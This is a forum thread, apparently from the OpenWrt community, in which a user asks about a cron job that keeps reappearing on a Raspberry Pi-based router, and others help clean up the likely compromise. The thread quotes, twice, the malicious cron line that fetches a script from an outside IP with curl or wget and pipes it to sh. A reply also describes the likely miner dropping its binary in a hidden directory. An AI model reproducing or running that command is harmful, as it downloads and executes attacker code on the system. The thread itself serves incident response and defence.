Good evening,
I noticed a couple of days ago that a scheduled task had stopped running. On checking LuCI, the task had been removed and the following in it's place:-
21 * * * * sh -c '( curl http://45.125.131.17/df2vGJJ58ivF -sk || wget http://45.125.131.17/df2vGJJ58ivF -O -)| sh'
I deleted it, but it's re-appeared. I've installed BanIP and changed root's password, but it keeps re-appearing. The IP is in Thailand.
Can anyone shed any light on what's going on?
Thank you!
Deleted the task, now this has appeared:-
49 * * * * sh -c '( curl http://45.125.131.17/df2vGJJ58ivF -sk || wget http://45.125.131.17/df2vGJJ58ivF -O -)| sh'
Resolves to apnic dot net.
Is that your ISP?
No my ISP is Spectrum (Charter) in the USA.
shutdown the device you used to delete the script and see what happens if you delete it on another machine.
What is the output of the following:
ubus call system board
That's definitely malicious. It will fetch and execute arbitrary code from the remote location.
It's very likely that malware has been inserted other places in the router's filesystem. Using a known-clean PC (never has been connected to this router or online) re-flash the router without saving settings then set a secure password and reconfigure it.
We need to figure out which device(s) have the credentials to log back into LuCI, or CLI the script.
wget is a download app that will download, restart after being suspended and do it in the background.
Looks like somebody installed or tried to install a crypto miner on your router lol
"kernel": "5.10.161",
"hostname": "OpenWrt",
"system": "ARMv8 Processor rev 3",
"model": "Raspberry Pi Compute Module 4 Rev 1.0",
"board_name": "raspberrypi,4-compute-module",
"rootfs_type": "ext4",
"release": {
"distribution": "OpenWrt",
"version": "22.03.3",
"revision": "r20028-43d71ad93e",
"target": "bcm27xx/bcm2711",
"description": "OpenWrt 22.03.3 r20028-43d71ad93e"
I stopped the cron service and the task hasn’t reappeared.
I have a backup from before it was hacked. Would that be ok?
Start by upgrading your device. 22.03.3 does have known issues, so at least upgrade to 22.03.6 (latest for the 22.03 series). Recommended would be to upgrade to to 23.05.2. Both of these will have the most up-to-date security patches.
Regarding the backup files -- I'd restore them manually -- and examine each file. The key files are usually:
/etc/config/network
/etc/config/dhcp
/etc/config/wireless
/etc/config/firewall
Plus any that are for specific packages you're running.
Make a backup of the current system, too -- you may want to examine those files to see what might be going on (once you can do it safely on a different machine and have a secure router again).
This may not be too pernicious as it appears that the primary intent is to download a binary which most likely mines crypto and posts any profitable results to another server. The binary (named amd64) is placed in a hidden directory that starts with .systemd-private- under either /var/tmp, $HOME, or /tmp
Thank you for the instructions. It’s greatly appreciated.
Very interesting. The question is how did they get access to my router?
One of the interesting things here is that this is one of the first times that I can recall seeing an OpenWrt device that was legitimately hacked or otherwise doing something that is not normal.
I am not sufficiently well versed in deconstructing stuff of this type to be able to actually say if this was a hack due to a vulnerability vs something hidden in a package that may have been installed by the OP at some point, or some other explanation. However, this behavior is almost certainly not normal nor is it expected for OpenWrt in general. I cannot personally speak to the content/purpose of this particular code, either -- this is well outside my area of expertise.
In the vast majority of "has my router been hacked" type threads, it turns out to be normal processes that are misunderstood by the posters (for example, NTP syncs or other similar processes that are mistaken for 'phone home' routines or otherwise assumed to be potentially malicious.
@jupiterx64 - when you reinstall your packages and config files, it makes sense to ensure that any tutorials you are following or configurations you put in place are well vetted. If there are any questions along the way, feel free to ask.
Yes, I completely agree with you. I’ll review the installed packages. The other possibility is a week root password.
As for the versions of OpenWRT to install, I’m very limited due to the hardware.
The only ones available are listed here https://1drv.ms/u/s!AqG2uRmVUhlSh0NHMLMmQKLyASvi?e=mup3cd
Thank you again!
Are you 100% certain you can trust the build you are using? Is there accountability and transparency of that build?
What about firmware from the official project??
https://firmware-selector.openwrt.org/?version=23.05.2&target=bcm27xx%2Fbcm2711&id=rpi-4